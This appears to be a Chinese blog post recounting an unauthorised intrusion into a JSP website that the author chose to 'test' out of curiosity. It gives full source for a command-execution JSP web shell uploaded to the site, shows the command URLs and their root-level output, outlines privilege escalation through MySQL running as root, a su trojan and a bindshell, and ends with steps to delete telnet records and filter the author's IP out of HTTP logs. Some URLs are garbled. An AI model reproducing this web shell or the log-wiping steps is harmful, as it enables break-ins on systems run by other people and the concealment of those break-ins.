很偶然的一個機會,瀏覽到一個網站,頁面清新讓人感覺很舒服。網站是用JSP開發的,出于個人愛好,我決定測試一下其系統的安全性。
[page_break] 再寫一個JSP文件: 〈% try { String cmd = request.getParameter("cmd"); Process child = Runtime.getRuntime().exec(cmd); InputStream in = child.getInputStream(); int c; while ((c = in.read()) != -1) { out.print((char)c); } in.close(); try { child.waitFor(); } catch (InterruptedException e) { e.printStackTrace(); } } catch (IOException e) { System.err.println(e); } %〉 然后把這個JSP再通過upload上傳,有SHELL了。 http://target:8080http://img.luoboxitong.cn/upload/technique_8/cmd.jsp?cmd=ls+-la+/ (詳細結果這里就不列出來了) 怎么獲得root權限呢?經過一番搜索發現系統安裝了MySQL,并且從JSP的源代碼中得到了MySQL的密碼,執行: sqld"〉http://target:8080http://img.luoboxitong.cn/upload/technique_8/cmd.jsp?cmd=ps+aux+|grep+mysqld 顯示: root 87494 0.2 1.9 17300 4800 p0- S 28Jun01 5:54.72 /usr/local/data/mysql 系統是以root身份運行的MySQL。這時我思考了一下,既然知道了MySQL的密碼,那就可以寫一個SHELL程序,讓它創建一個表,然后將我的數據放到表中,再使用“select ... into outfile;”的辦法在系統上創建一個文件,讓用戶在執行su的時候,運行我的程序。(還記得apache.org有一次被入侵嗎?黑客就采用的這種辦法)。 之后就比較簡單了,上傳bindshell之類的程序,運行、獲得nobody的權限,使用su root時幫忙創建的setuid shell讓自己成為root。 但是,接下來已經實際操作,結果令人頗感意外: http://target:8080http://img.luoboxitong.cn/upload/technique_8/cmd.jsp?cmd=id 顯示: uid=0(root) gid=0(xxx) groups=0(xxx),2(xxx),3(xxx),4(xxx),5(xxx),20(xxx),31(xxx) 原來這個WEB SHELL本來就是ROOT!管理員的安全設置工作到底怎么做的? http://target:8080http://img.luoboxitong.cn/upload/technique_8/cmd.jsp?cmd=ps+aux 果然是root身份運行的(不列出來了) 剩下的事情: 1、刪除我的telnet記錄。 2、刪除http的日志。 清除日志我使用的辦法是:cat xxx |grep -V "IP" 〉〉temp然后在把temp覆蓋那些被我修改過的日志文件。 |
溫馨提示:喜歡本站的話,請收藏一下本站!